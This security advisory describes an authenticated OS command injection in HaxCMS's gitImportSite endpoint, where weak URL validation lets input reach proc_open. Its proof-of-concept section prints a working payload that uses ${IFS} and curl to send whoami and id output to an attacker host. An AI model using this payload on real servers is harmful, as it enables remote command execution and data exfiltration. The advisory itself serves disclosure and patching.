OS Command Injection In @haxtheweb/haxcms-nodejs
Description
HaxCMS-PHP Command Injection Vulnerability
Summary
The 'gitImportSite' functionality obtains a URL string from a POST request and insufficiently validates user input. The ’set_remote’ function later passes this input into ’proc_open’, yielding OS command injection.
Details
The vulnerability exists in the logic of the ’gitImportSite’ function, located in ’Operations.php’. The current implementation only relies on the ’filter_var’ and 'strpos' functions to validate the URL, which is not sufficient to ensure absence of all Bash special characters used for command injection.
Affected Resources
• Operations.php:2103 gitImportSite() • <domain>/<user>/system/api/gitImportSite
PoC
To replicate this vulnerability, authenticate and send a POST request to the 'gitImportSite' endpoint with a crafted URL in the JSON data. Note, a valid token needs to be obtained by capturing a request to another API endpoint (such as 'archiveSite').
Start a webserver.
Initiate a request to the ’archiveSite’ endpoint.
Capture and modify the request in BurpSuite.
Observe command output in the HTTP request from the server.
Command Injection Payload
http://<IP>/.git;curl${IFS}<IP>/$(whoami)/$(id)#=abcdef
Impact
An authenticated attacker can craft a URL string that bypasses the validation checks employed by the ’filter_var’ and ’strpos’ functions in order to execute arbitrary OS commands on the backend server. The attacker can exfiltrate command output via an HTTP request.
Mitigation
Update Impact
Minimal update. May introduce new vulnerabilities or breaking changes.
Ecosystem | Package | Affected version | Patched versions |
|---|---|---|---|
 npm | 11.0.3 |
Aliases
References